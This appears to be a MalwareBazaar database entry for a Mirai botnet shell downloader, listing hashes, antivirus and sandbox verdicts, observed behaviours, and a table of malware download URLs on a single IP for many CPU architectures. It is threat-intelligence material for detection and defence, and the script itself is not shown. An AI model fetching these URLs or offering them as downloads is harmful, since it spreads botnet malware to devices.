MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994
SHA3-384 hash: bb33c142dc7a6748d35b8c4c18be0ac47cb83d3765dda3b6cf4739d1fb65379736dbc777d68ff0a2f35504395a9fa1e9
SHA1 hash: 4a2f20114720f0f2af1fa745d03cb6a477eba585
MD5 hash: c97c386e949a7b7f4f87cbfbbd3a4049
humanhash: illinois-fourteen-arizona-high
File name:wget.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:2'790 bytes
First seen:2025-05-16 13:54:11 UTC
Last seen:2025-05-16 16:28:51 UTC
File type: sh
MIME type:text/x-shellscript
ssdeep 24:vfnKnbfnA8nA2hikfnsneyfnvnpfnVn9fnWenWCnfnTNKnTuwhfn2n7fnFnJfnNv:vmIn2h0JfT7N6xh6zFy3hBT4k0
TLSH T1855148C622D7913138629A67B6BA4D0D32C0D09B9FC5EE48ADDC3CF9869CE593440B57
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://45.135.194.43/bins/Tsunami.x866a889a1fc6489ff0adb0fa87cc61ae0a42b569e8cf89b469e725bdad760ca785 Miraielf mirai
http://45.135.194.43/bins/Tsunami.mips13cab87cd2580d34f0c60b31897281fc5870f1a979b8ee71683374dfe0c250e1 Miraielf mirai
http://45.135.194.43/bins/Tsunami.arcn/an/an/a
http://45.135.194.43/bins/Tsunami.i468n/an/an/a
http://45.135.194.43/bins/Tsunami.i686n/an/an/a
http://45.135.194.43/bins/Tsunami.x86_64n/an/an/a
http://45.135.194.43/bins/Tsunami.mpsl3f6efeb115b2c69c73c25799395824bd428024cdcc708036eeafe23cc08096ee Miraielf mirai
http://45.135.194.43/bins/Tsunami.arm4cd5a0b8f450bb4b1eaeabe20ed1d9ff59aae87e272998d56e73d813da5040c1 Miraielf mirai
http://45.135.194.43/bins/Tsunami.arm599bebadd78994cbddd0102281a400751050338ee7c6f1926f29093c966b6a0e5 Miraielf mirai
http://45.135.194.43/bins/Tsunami.arm67505011063ab00bcd3113fe2d7c3855d50af49a753015cd9018cbbfe65bd84db Miraielf mirai
http://45.135.194.43/bins/Tsunami.arm7fe9a5117526681f8c5c0b73d9ebca60f64b3c534c000374b1fe3f70dbc462a27 Miraielf mirai
http://45.135.194.43/bins/Tsunami.ppc1225c2ed8afdb69733b59a23f77b6aa6ccd62c5f817c9da8a9c169c3aa157322 Miraielf mirai
http://45.135.194.43/bins/Tsunami.spcbdd6d6b9b6a5c36ed92b6781ae0132cf361eeb27d32e9539581564663dccc29c Miraielf mirai
http://45.135.194.43/bins/Tsunami.m68kd980ea20258d480e3f0de0ec4db24a65ee3b90ee277df2098ddc201b674cf7c2 Miraielf mirai
http://45.135.194.43/bins/Tsunami.sh41a212f5d854cd5a21239232901ff2f5783ebabc73906304644b486474de6a1b3 Miraielf mirai

Intelligence

File Origin
# of uploads :
2
# of downloads :
68
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
94.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68274489e16384d6a704fc7blinux22vpnfull_triage
Tags:
downloader agent overt
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/682743bf15ed82cd53d7ab4a/reports/330698b6-68ac-494b-9760-bd42ea8ccbd2/overview
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994/
Threat name:
Linux.Downloader.Morila
Create hunting rule
Status:
Malicious
First seen:
2025-05-16 13:55:15 UTC
File Type:
Text (Shell)
AV detection:
17 of 24 (70.83%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ff7vfaugtnglklyxjd5gfg3ik32wqypkkyn3nzi3bkrmo4mvlgka._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai botnet:lzrd antivm botnet defense_evasion discovery linux upx
Link:
https://tria.ge/reports/250516-q78gcahj7s/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (682165) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/297f5282869b/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Mirai
Score:
0.90
Link:
https://yomi.yoroi.company/submissions/297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 297f5282869b4cb52f1748fa629b6856f56861ea561bb6e51b0aa2c771955994

(this sample)

Mirai

elf 99384fa02fb546ecf81837bc109b2502ca09550d35c15c8a70897ac0549898b7

  
URLhaus
https://urlhaus.abuse.ch/url/3544923/
  
Delivery method
Distributed via web download
  
Dropping
MD5 85711bdf966bd9fbac6a6ccf9f4edd79
  
Dropping
SHA256 99384fa02fb546ecf81837bc109b2502ca09550d35c15c8a70897ac0549898b7

Comments